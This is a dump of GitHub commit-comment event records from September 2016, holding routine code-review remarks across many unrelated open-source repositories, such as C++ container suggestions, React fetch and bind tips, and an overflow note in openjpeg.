{"id":"4531903699","type":"CommitCommentEvent","actor":{"login":"theuni"},"repo":{"name":"JeremyRubin/bitcoin"},"payload":{"comment":{"id":18939826,"position":null,"line":null,"path":null,"commit_id":"0c9d659acd4979db847f44a934060d0b29257ac9","created_at":"2016-09-08T05:31:30Z","updated_at":"2016-09-08T05:31:30Z","body":"Could you please explain the reasoning for the emplacer? As far as I can see, it's used to minimize copying (and presumably locktime) of elements. Seems like using a list or forward_list along with splice() would accomplish the same thing, but without the need for the awkward construct.\r\n\r\nUser creates a std::list<CScriptCheck>, uses emplace_back to construct in-place, perfect-forwards that list into CCheckQueue, then splice() internally grabs from either the reference or rvalue (either one without copying).\r\n\r\nOr is there an advantage of the emplacer that I'm not seeing?"}},"created_at":"2016-09-08T05:31:30Z"}
{"id":"4531907641","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939846,"position":71,"line":69,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:33:06Z","updated_at":"2016-09-08T05:33:06Z","body":"Also, if you were switching this to the fetch standard:\r\n\r\n    fetch(`http://www.omdbapi.com/?s=${this.props.dataForTable}`)\r\n      .then(response => response.json())\r\n      .then(json => this.setState({ movies: json.data.Search }));"}},"created_at":"2016-09-08T05:33:06Z"}
{"id":"4531916178","type":"CommitCommentEvent","actor":{"login":"masaki-kusuhata"},"repo":{"name":"k-mopi/OSC-Fukuoka-2016"},"payload":{"comment":{"id":18939849,"position":null,"line":null,"path":null,"commit_id":"80d506c771347d8d359237e943dbcdabb9097324","created_at":"2016-09-08T05:36:31Z","updated_at":"2016-09-08T05:36:31Z","body":"細かい制御が難しそうですけど、発想が面白ですね！\r\n\r\n@hirokihara さん、まじ、アイデアマン"}},"created_at":"2016-09-08T05:36:31Z"}
{"id":"4531921415","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/qmlsa"},"payload":{"comment":{"id":18939856,"position":56,"line":50,"path":"quic_util.c","commit_id":"f99d8b3ab63a1cbaaedef0545778f2936c1c8561","created_at":"2016-09-08T05:38:29Z","updated_at":"2016-09-08T05:38:29Z","body":"Wait, is the intermediary variable really necessary?"}},"created_at":"2016-09-08T05:38:29Z"}
{"id":"4531922026","type":"CommitCommentEvent","actor":{"login":"wuwenqiang33"},"repo":{"name":"wuwenqiang33/helloworld"},"payload":{"comment":{"id":18939857,"position":null,"line":null,"path":null,"commit_id":"23e89adfc2170ee58e14e7406d20e977041f4009","created_at":"2016-09-08T05:38:43Z","updated_at":"2016-09-08T05:38:43Z","body":"test"}},"created_at":"2016-09-08T05:38:43Z"}
{"id":"4531925001","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939862,"position":55,"line":53,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:39:55Z","updated_at":"2016-09-08T05:39:55Z","body":"This bind is unnecessary. Here's a quick example of how `this` works in an object (I'm writing this in ES5 so you can run it easily in your browser console if you want to verify the output):\r\n\r\nLet's say you have a super simple object:\r\n\r\n    var simple = {\r\n      value: 10,\r\n      log: function() { console.log(this.value); }\r\n    };\r\n\r\n    simple.log() // 10\r\n\r\nIn this example, `this` is really just the `simple` object. Hopefully, this is straightforward so far. Now, let's say we do something like this:\r\n\r\n    var fn = simple.log;\r\n    fn(); // undefined\r\n\r\nWhat's the difference? The assignment causes `this` to no longer be our `simple` object. To fix this, we \"bind\" `simple` to our function.\r\n\r\n    var boundFn = simple.log.bind(simple);\r\n    boundFn(); // 10"}},"created_at":"2016-09-08T05:39:55Z"}
{"id":"4531928095","type":"CommitCommentEvent","actor":{"login":"kytrinyx"},"repo":{"name":"exercism/xfactor"},"payload":{"comment":{"id":18939865,"position":null,"line":null,"path":null,"commit_id":"856b65d4cc93a2f0d3dce80d4f6588f649d9f1b2","created_at":"2016-09-08T05:41:08Z","updated_at":"2016-09-08T05:41:08Z","body":"Because hello world wasn't implemented yet, and that breaks the API."}},"created_at":"2016-09-08T05:41:08Z"}
{"id":"4531934279","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939872,"position":65,"line":63,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:43:23Z","updated_at":"2016-09-08T05:43:23Z","body":"There's some convenience syntax for combining strings and variables:\r\n\r\n    `http://www.omdbapi.com/?s=${this.props.dataForTable}`"}},"created_at":"2016-09-08T05:43:23Z"}
{"id":"4531937810","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18939878,"position":null,"line":null,"path":null,"commit_id":"be8a9f674281699995b7db08fcd8a51fdb1fce87","created_at":"2016-09-08T05:44:41Z","updated_at":"2016-09-08T05:44:41Z","body":"Discussion at [Merge HMQV and CONSTEXPR branch into Master](http://groups.google.com/d/msg/cryptopp-users/U1OuQCPJSFM/uzU6IT67FAAJ) on the mailing list.\r\n\r\nThe CONSTEXPR dev-branch included whitespace cleanup for affected files.\r\n\r\nWhen the CONSTEXPR dev-branch was merged into Master, `git merge constexpr` was used rather than `git merge --squash constexpr`. Master now reports a bunch of problems that were never on Master. Sorry about that."}},"created_at":"2016-09-08T05:44:41Z"}
{"id":"4531937991","type":"CommitCommentEvent","actor":{"login":"d00p"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18939879,"position":69,"line":161,"path":"scripts/jobs/cron_letsencrypt.php","commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-08T05:44:45Z","updated_at":"2016-09-08T05:44:45Z","body":"Ah, i need to distinguish whether there is no cert at all and a cert that needs to renewal yet\nAm 08.09.2016 12:43 vorm. schrieb Jan Erik Petersen <notifications@github.com>:Empty result set.\r\n\r\nThere is one record with domainid=0, but its expirationdate is 3 months in the future.\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-08T05:44:45Z"}
{"id":"4531939509","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939881,"position":44,"line":42,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:45:20Z","updated_at":"2016-09-08T05:45:20Z","body":"This is functionally a good idea but there's a better way of writing this. In your render function, I'd replace this line with:\r\n\r\n    {this.renderResultTable()}\r\n\r\nAnd I'd define the function above:\r\n\r\n    renderResultTable() {\r\n      if (!this.state.shouldLoadMovies) return <div>Waiting for input</div>;\r\n\r\n      return <ResultTable id=\"results\" dataForTable={this.state.userInput} />;\r\n    }"}},"created_at":"2016-09-08T05:45:20Z"}
{"id":"4531942051","type":"CommitCommentEvent","actor":{"login":"stweil"},"repo":{"name":"uclouvain/openjpeg"},"payload":{"comment":{"id":18939884,"position":5,"line":1244,"path":"src/lib/openjp2/pi.c","commit_id":"ef01f18dfc6780b776d0674ed3e7415c6ef54d24","created_at":"2016-09-08T05:46:16Z","updated_at":"2016-09-08T05:46:16Z","body":"I'd cast `l_tcp->numlayers`. Otherwise the addition could overflow (resulting in 0). I admit that the chances that this will happen are very low."}},"created_at":"2016-09-08T05:46:16Z"}
{"id":"4531942284","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939885,"position":75,"line":73,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:46:21Z","updated_at":"2016-09-08T05:46:21Z","body":"Good thinking :+1:\r\n\r\nLong term, you may want to consider moving the fetch logic out of the component and into a saga."}},"created_at":"2016-09-08T05:46:21Z"}
{"id":"4531946923","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":18939887,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-08T05:48:07Z","updated_at":"2016-09-08T05:48:07Z","body":"Why do this?"}},"created_at":"2016-09-08T05:48:07Z"}
{"id":"4531947897","type":"CommitCommentEvent","actor":{"login":"ruzia"},"repo":{"name":"ruzia/handsontable"},"payload":{"comment":{"id":18939890,"position":6,"line":327,"path":"src/editorManager.js","commit_id":"88ca0a373d61002390d91e155c66274f1ad2d3d3","created_at":"2016-09-08T05:48:29Z","updated_at":"2016-09-08T05:48:29Z","body":"ぉ！ありがとうございますー\r\n\r\nこれだと上手くいかない場合を見つけて\r\n```\r\nif (typeof(editorClass) != \"function\" && activeEditor && activeEditor.TEXTAREA) {\r\n```\r\n\r\nとか色々試してた所でした。\r\n教えて頂いたのも試してみます！"}},"created_at":"2016-09-08T05:48:29Z"}
{"id":"4531951194","type":"CommitCommentEvent","actor":{"login":"cnb"},"repo":{"name":"cnb/News_Manager-getsimplecms"},"payload":{"comment":{"id":18939895,"position":null,"line":null,"path":null,"commit_id":"b8b7ed87afaab06a2fae00a97ea33d13794af90c","created_at":"2016-09-08T05:49:48Z","updated_at":"2016-09-08T05:49:48Z","body":"a mess of a diff...\r\nI've just added `if {strftime} else {date}`"}},"created_at":"2016-09-08T05:49:48Z"}
{"id":"4531958098","type":"CommitCommentEvent","actor":{"login":"cescoffier"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18939905,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T05:52:23Z","updated_at":"2016-09-08T05:52:23Z","body":"Hi @melke This implementation is quite simple, but it's not part of the official Vert.x stack yet. If you are interested by this component, open a \"wish\" on https://github.com/vert-x3/issues/issues and we will consider its integration into Vert.x 3.4.\r\n\r\nNotice that this cache implementation are not local (but use a distributed map)."}},"created_at":"2016-09-08T05:52:23Z"}
{"id":"4531960537","type":"CommitCommentEvent","actor":{"login":"kisey"},"repo":{"name":"kisey/video-courses"},"payload":{"comment":{"id":18939909,"position":14,"line":13,"path":"public/app/ks-form/ks-form.ctrl.js","commit_id":"f2c5d99afd85ee6a3b9a4085d2a6aef9c2324dbc","created_at":"2016-09-08T05:53:16Z","updated_at":"2016-09-08T05:53:16Z","body":"Ахаха... поправил."}},"created_at":"2016-09-08T05:53:16Z"}
{"id":"4531963764","type":"CommitCommentEvent","actor":{"login":"OXVyeah"},"repo":{"name":"OXVyeah/yayade"},"payload":{"comment":{"id":18939912,"position":4,"line":6,"path":"config/abc.json","commit_id":"72ec2fdf2ff181a33f665b75e2a473046c09b1a1","created_at":"2016-09-08T05:54:25Z","updated_at":"2016-09-08T05:54:25Z","body":"去掉 screenshotter"}},"created_at":"2016-09-08T05:54:25Z"}
{"id":"4531965678","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"spring-cloud/spring-cloud-contract"},"payload":{"comment":{"id":18939918,"position":1,"line":1,"path":"spring-cloud-contract-dependencies/.factorypath","commit_id":"ff48c5dbdaadee9e8a147c13a58a33ecf98ba408","created_at":"2016-09-08T05:55:09Z","updated_at":"2016-09-08T05:55:09Z","body":"Eclipse metadata. Should be deleted and ignored."}},"created_at":"2016-09-08T05:55:09Z"}
{"id":"4531969822","type":"CommitCommentEvent","actor":{"login":"mayeut"},"repo":{"name":"uclouvain/openjpeg"},"payload":{"comment":{"id":18939921,"position":null,"line":null,"path":null,"commit_id":"ef01f18dfc6780b776d0674ed3e7415c6ef54d24","created_at":"2016-09-08T05:56:37Z","updated_at":"2016-09-08T05:56:37Z","body":"The latter. It might need a comment in source code to clarify that information though: https://github.com/uclouvain/openjpeg/blob/master/src/lib/openjp2/j2k.c#L2546\r\nIf this wasn't the case we would need an overflow check on the addition as well because on x86, `SIZE_MAX == UINT32_MAX` "}},"created_at":"2016-09-08T05:56:37Z"}
{"id":"4531971066","type":"CommitCommentEvent","actor":{"login":"mayeut"},"repo":{"name":"uclouvain/openjpeg"},"payload":{"comment":{"id":18939923,"position":5,"line":1244,"path":"src/lib/openjp2/pi.c","commit_id":"ef01f18dfc6780b776d0674ed3e7415c6ef54d24","created_at":"2016-09-08T05:57:04Z","updated_at":"2016-09-08T05:57:04Z","body":"The latter. It might need a comment in source code to clarify that information though: https://github.com/uclouvain/openjpeg/blob/master/src/lib/openjp2/j2k.c#L2546\r\nIf this wasn't the case we would need an overflow check on the addition as well because on x86, `SIZE_MAX == UINT32_MAX` "}},"created_at":"2016-09-08T05:57:04Z"}
{"id":"4531972450","type":"CommitCommentEvent","actor":{"login":"torodev"},"repo":{"name":"torodev/myRepo"},"payload":{"comment":{"id":18939925,"position":3,"line":null,"path":"README.md","commit_id":"0face8743089e242efaaaa0c2cc46b6117a396cb","created_at":"2016-09-08T05:57:30Z","updated_at":"2016-09-08T05:57:30Z","body":"Why do this?"}},"created_at":"2016-09-08T05:57:30Z"}
{"id":"4531973345","type":"CommitCommentEvent","actor":{"login":"Persephone"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18939927,"position":null,"line":null,"path":null,"commit_id":"19e757af5cb6bbde3f9263f0f4aaec87a7e0301c","created_at":"2016-09-08T05:57:49Z","updated_at":"2016-09-08T05:57:49Z","body":"This bugged out abilities like Aspect of the Hawk and Aspect of the Cheeta, natures grasp etc. They stopped proccing their effects. For example, aspect of the cheetah when hunters got hit they did not get dazed."}},"created_at":"2016-09-08T05:57:49Z"}
{"id":"4531975028","type":"CommitCommentEvent","actor":{"login":"mbj"},"repo":{"name":"devcon5io/pitest"},"payload":{"comment":{"id":18939929,"position":null,"line":null,"path":null,"commit_id":"39c46f1eea3c8b9d376eef38c118a2712539a20f","created_at":"2016-09-08T05:58:26Z","updated_at":"2016-09-08T05:58:26Z","body":"@gmuecke Nice to find you mutation testing infected."}},"created_at":"2016-09-08T05:58:26Z"}
{"id":"4531979214","type":"CommitCommentEvent","actor":{"login":"akoh17"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":18939934,"position":65,"line":63,"path":"ui/app.jsx","commit_id":"74d903948573f019162da1b10711b40f94cf350a","created_at":"2016-09-08T05:59:54Z","updated_at":"2016-09-08T05:59:54Z","body":"Hi Adam,\n\nThank you for all of the suggestions. I find them very useful and they will help me learn ReactJS better. I will be revising my code a lot. As of now, I just tried hacking something together to get it to work and learn more about ReactJS. I look forward to seeing you on Friday!\n\nBest,\nAlex\n\n> On Sep 7, 2016, at 10:43 PM, Adam Wexler <notifications@github.com> wrote:\n> \n> There's some convenience syntax for combining strings and variables:\n> \n> `http://www.omdbapi.com/?s=${this.props.dataForTable}`\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-08T05:59:54Z"}
{"id":"4531985180","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18939971,"position":5,"line":249,"path":"CMakeLists.txt","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:01:38Z","updated_at":"2016-09-08T06:01:38Z","body":"`# CPR includes a test folder that conflicts with Citra Test so it is advisable to be turned off`"}},"created_at":"2016-09-08T06:01:38Z"}
{"id":"4531989147","type":"CommitCommentEvent","actor":{"login":"cyberwolf30"},"repo":{"name":"freqlabs/alexa-8ball-scala"},"payload":{"comment":{"id":18939991,"position":2,"line":25,"path":"src/main/scala/com/freqlabs/magic8ball/Magic8BallSpeechlet.scala","commit_id":"b576097b75727a30c3f04511c7348b92238b1df0","created_at":"2016-09-08T06:03:02Z","updated_at":"2016-09-08T06:03:02Z","body":"Sup Ryan"}},"created_at":"2016-09-08T06:03:02Z"}
{"id":"4531990354","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18939993,"position":12,"line":11,"path":"appveyor.yml","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:03:28Z","updated_at":"2016-09-08T06:03:28Z","body":"`If you are unsure what to download from this page then please download the latest Setup.exe and run the installer after that.`"}},"created_at":"2016-09-08T06:03:28Z"}
{"id":"4531997624","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940000,"position":36,"line":84,"path":"appveyor.yml","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:05:57Z","updated_at":"2016-09-08T06:05:57Z","body":"# Create a new path and copy the output to post build"}},"created_at":"2016-09-08T06:05:57Z"}
{"id":"4531997768","type":"CommitCommentEvent","actor":{"login":"sttts"},"repo":{"name":"sttts/docker-k8s-mesos"},"payload":{"comment":{"id":18940001,"position":null,"line":null,"path":null,"commit_id":"55d07cd7d0a3c142a2ff85e284d4f366d1f04cf3","created_at":"2016-09-08T06:06:00Z","updated_at":"2016-09-08T06:06:00Z","body":"Warum das \"exit 1\" ?"}},"created_at":"2016-09-08T06:06:00Z"}
{"id":"4531998253","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18940003,"position":null,"line":null,"path":null,"commit_id":"26cbb4552f1a23936d5bd7d4e47892bd3bc60fc5","created_at":"2016-09-08T06:06:10Z","updated_at":"2016-09-08T06:06:10Z","body":"I have a number of problems with this.\r\n\r\nFirst, it should be optional (command line option perhaps?).\r\n\r\nSecond, it can totally hang the program if a debugger is attached.  If there test is in a loop, say, and has timed out, then its thread is till running (the join did not take place).  Therefore, calling thread.Join() now hangs the program on that Join call, which may never return."}},"created_at":"2016-09-08T06:06:10Z"}
{"id":"4532001909","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940010,"position":10,"line":8,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:07:29Z","updated_at":"2016-09-08T06:07:29Z","body":"`// Have to include getopt in the compilation unit or else it will be compiled with the wrong runtime`\r\n"}},"created_at":"2016-09-08T06:07:29Z"}
{"id":"4532002138","type":"CommitCommentEvent","actor":{"login":"octoploid"},"repo":{"name":"csmith-project/creduce"},"payload":{"comment":{"id":18940011,"position":5,"line":143,"path":"clang_delta/RemoveUnusedOuterClass.cpp","commit_id":"7da8763a615444100ab29a09084bb705b810a95c","created_at":"2016-09-08T06:07:34Z","updated_at":"2016-09-08T06:07:34Z","body":"Shouldn't this be: getBraceRange().getBegin()?"}},"created_at":"2016-09-08T06:07:34Z"}
{"id":"4532002284","type":"CommitCommentEvent","actor":{"login":"octoploid"},"repo":{"name":"csmith-project/creduce"},"payload":{"comment":{"id":18940012,"position":5,"line":143,"path":"clang_delta/SimplifyNestedClass.cpp","commit_id":"7da8763a615444100ab29a09084bb705b810a95c","created_at":"2016-09-08T06:07:36Z","updated_at":"2016-09-08T06:07:36Z","body":"and here, too?"}},"created_at":"2016-09-08T06:07:36Z"}
{"id":"4532005466","type":"CommitCommentEvent","actor":{"login":"joostfaassen"},"repo":{"name":"userbase-project/userbase-client-php"},"payload":{"comment":{"id":18940021,"position":7,"line":160,"path":"src/Model/User.php","commit_id":"2f12ee6c0a36e3430940ce940a9e220ff49a0179","created_at":"2016-09-08T06:08:40Z","updated_at":"2016-09-08T06:08:40Z","body":"@h-wang thanks, added 👍 "}},"created_at":"2016-09-08T06:08:40Z"}
{"id":"4532006762","type":"CommitCommentEvent","actor":{"login":"jroweboy"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940023,"position":12,"line":11,"path":"appveyor.yml","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:09:11Z","updated_at":"2016-09-08T06:09:11Z","body":"Oh yeah i forgot to push my latest version of this text. Are you wanting to help test this out some? Also thanks for the code review :D"}},"created_at":"2016-09-08T06:09:11Z"}
{"id":"4532008018","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18940026,"position":null,"line":null,"path":null,"commit_id":"e90a99f1be01d4d00e2e0d9715872200ae0c2fb6","created_at":"2016-09-08T06:09:35Z","updated_at":"2016-09-08T06:09:35Z","body":"The result of http://tests.stockfishchess.org/tests/view/57ced22c0ebc59030fbe4fa1\r\nis a little bit surprising to me.\r\n@VoyagerOne Can it be that we need a bigger linear component in the bonus formula ?\r\nI'm preparing a path which uses a  bigger linear component and compensates with the square-exponent to reach the old value for depth 17. I would appreciate your precious advice."}},"created_at":"2016-09-08T06:09:35Z"}
{"id":"4532009976","type":"CommitCommentEvent","actor":{"login":"SamVerschueren"},"repo":{"name":"SamVerschueren/alfred-notifier"},"payload":{"comment":{"id":18940030,"position":5,"line":5,"path":"index.js","commit_id":"e4c7abecd27ff686aea4abd9da87abfcfa33b256","created_at":"2016-09-08T06:10:17Z","updated_at":"2016-09-08T06:10:17Z","body":"Thanks! Looked sloppy to me as well so good thing it can be improved :)."}},"created_at":"2016-09-08T06:10:17Z"}
{"id":"4532011468","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940035,"position":50,"line":152,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:10:46Z","updated_at":"2016-09-08T06:10:46Z","body":"// Check for updates"}},"created_at":"2016-09-08T06:10:46Z"}
{"id":"4532015632","type":"CommitCommentEvent","actor":{"login":"melke"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18940046,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T06:12:15Z","updated_at":"2016-09-08T06:12:15Z","body":"Thanks for your answer @cescoffier ! Would you consider other in-JVM caches like ehcache, guava or cache2k to be inappropriate to use in a Vert.x environment? Being blocking or otherwise not suitable for the Vert.x threading model?"}},"created_at":"2016-09-08T06:12:15Z"}
{"id":"4532015729","type":"CommitCommentEvent","actor":{"login":"ginkel"},"repo":{"name":"sttts/docker-k8s-mesos"},"payload":{"comment":{"id":18940047,"position":null,"line":null,"path":null,"commit_id":"55d07cd7d0a3c142a2ff85e284d4f366d1f04cf3","created_at":"2016-09-08T06:12:18Z","updated_at":"2016-09-08T06:12:18Z","body":"Das normalisiert die möglichen Exit-Codes auf [0,1]. Siehe https://docs.docker.com/engine/reference/builder/#/healthcheck"}},"created_at":"2016-09-08T06:12:18Z"}
{"id":"4532016934","type":"CommitCommentEvent","actor":{"login":"hughbe"},"repo":{"name":"jamesqo/corefx"},"payload":{"comment":{"id":18940048,"position":23,"line":18,"path":"src/System.Linq/tests/ConcatTests.cs","commit_id":"74332b446ea89a5afb8fa699b7850e4394357fbb","created_at":"2016-09-08T06:12:38Z","updated_at":"2016-09-08T06:12:38Z","body":"By the way, checkout my PR to xunit that adds support for embedded genetics and arrays\r\n\r\n(E.g IEnumerable<T> and T[] )"}},"created_at":"2016-09-08T06:12:38Z"}
{"id":"4532016957","type":"CommitCommentEvent","actor":{"login":"alexkiro"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18940049,"position":129,"line":129,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-08T06:12:38Z","updated_at":"2016-09-08T06:12:38Z","body":"Yes, they saying not to escape everything, only these 3 characters. I don't really know what happens if you escape everything, or nothing. But I assume that formatting will be off. "}},"created_at":"2016-09-08T06:12:38Z"}
{"id":"4532019386","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940057,"position":58,"line":139,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:13:24Z","updated_at":"2016-09-08T06:13:24Z","body":"`// Start citra-qt under normal circumstances`"}},"created_at":"2016-09-08T06:13:24Z"}
{"id":"4532019717","type":"CommitCommentEvent","actor":{"login":"davidkilliansc"},"repo":{"name":"FasterXML/jackson-databind"},"payload":{"comment":{"id":18940059,"position":9,"line":716,"path":"src/main/java/com/fasterxml/jackson/databind/deser/BeanDeserializerFactory.java","commit_id":"b2ccdee0fdc52cd46577a90cb50dc011d6d681bf","created_at":"2016-09-08T06:13:30Z","updated_at":"2016-09-08T06:13:30Z","body":"I have no context on the code, but could this impact non-Throwables that happen to have a member named \"cause\"? "}},"created_at":"2016-09-08T06:13:30Z"}
{"id":"4532023047","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940066,"position":61,"line":142,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:14:38Z","updated_at":"2016-09-08T06:14:38Z","body":"`// Checking for updates in background mode`"}},"created_at":"2016-09-08T06:14:38Z"}
{"id":"4532023227","type":"CommitCommentEvent","actor":{"login":"alexkiro"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18940068,"position":165,"line":165,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-08T06:14:42Z","updated_at":"2016-09-08T06:14:42Z","body":"> e.g. have an emoji that means \"low\", \"normal\", \"high\", and \"highest\", and put that at the start of the footer (a custom emoji or there are probably a set of four that would make sense)\r\n\r\nHa, that would be fun, did you had any emoji in mind? (Adventure time?)"}},"created_at":"2016-09-08T06:14:42Z"}
{"id":"4532024657","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18940075,"position":null,"line":null,"path":null,"commit_id":"ef0bf87dc23921f61376768ea9a25f45dfa2c43d","created_at":"2016-09-08T06:15:11Z","updated_at":"2016-09-08T06:15:11Z","body":"Also see [Pull Request 258: Fix for CAST256 - Key-size](http://github.com/weidai11/cryptopp/pull/258)"}},"created_at":"2016-09-08T06:15:11Z"}
{"id":"4532025467","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940076,"position":62,"line":143,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:15:23Z","updated_at":"2016-09-08T06:15:23Z","body":"`// Fetch the latest revision number from GitHub`"}},"created_at":"2016-09-08T06:15:23Z"}
{"id":"4532025966","type":"CommitCommentEvent","actor":{"login":"alexcu"},"repo":{"name":"alexcu/splashkit-core"},"payload":{"comment":{"id":18940079,"position":null,"line":null,"path":null,"commit_id":"a494ba0dbc86078dbeba24bd5838c59cca88dc64","created_at":"2016-09-08T06:15:33Z","updated_at":"2016-09-08T06:15:33Z","body":"@macite?"}},"created_at":"2016-09-08T06:15:33Z"}
{"id":"4532026765","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940080,"position":65,"line":146,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:15:47Z","updated_at":"2016-09-08T06:15:47Z","body":"`// Fetch the tag name from json`"}},"created_at":"2016-09-08T06:15:47Z"}
{"id":"4532026993","type":"CommitCommentEvent","actor":{"login":"nmapgithub"},"repo":{"name":"Gnoxter/mountain_goat"},"payload":{"comment":{"id":18940081,"position":null,"line":null,"path":null,"commit_id":"31bc8549a65bdc0c53f15fd0926318cf66137179","created_at":"2016-09-08T06:15:51Z","updated_at":"2016-09-08T06:15:51Z","body":"i dont have pcap.h :[ "}},"created_at":"2016-09-08T06:15:51Z"}
{"id":"4532030554","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940093,"position":70,"line":151,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:17:05Z","updated_at":"2016-09-08T06:17:05Z","body":"`// Getting it ready to update to the latest version`"}},"created_at":"2016-09-08T06:17:05Z"}
{"id":"4532035735","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"jroweboy/citra"},"payload":{"comment":{"id":18940103,"position":72,"line":153,"path":"src/updater/updater.cpp","commit_id":"179705250b70d83d0363704e2bf8e71907f809c2","created_at":"2016-09-08T06:18:50Z","updated_at":"2016-09-08T06:18:50Z","body":"`// We have successfully completed the updating process! Upon next boot the new version is ready to be use.`"}},"created_at":"2016-09-08T06:18:50Z"}
{"id":"4532037073","type":"CommitCommentEvent","actor":{"login":"oznetmaster"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18940107,"position":null,"line":null,"path":null,"commit_id":"65f0b974cb65a6588a54de96f0ce929f57e39f59","created_at":"2016-09-08T06:19:16Z","updated_at":"2016-09-08T06:19:16Z","body":"Why was this excluded from the 2.0 builds?  I do not see anything that jumps out as not working on our 2.0 build."}},"created_at":"2016-09-08T06:19:16Z"}
{"id":"4532037306","type":"CommitCommentEvent","actor":{"login":"bauschan"},"repo":{"name":"ksjogo/platformsh-typo3-template"},"payload":{"comment":{"id":18940109,"position":null,"line":null,"path":null,"commit_id":"73d8bc16061edbf19fca2f6e7ed4a5d5b53d616c","created_at":"2016-09-08T06:19:20Z","updated_at":"2016-09-08T06:19:20Z","body":"Sure, but it actually broke the compiling of CSS files. I have to dig into it a bit deeper."}},"created_at":"2016-09-08T06:19:20Z"}
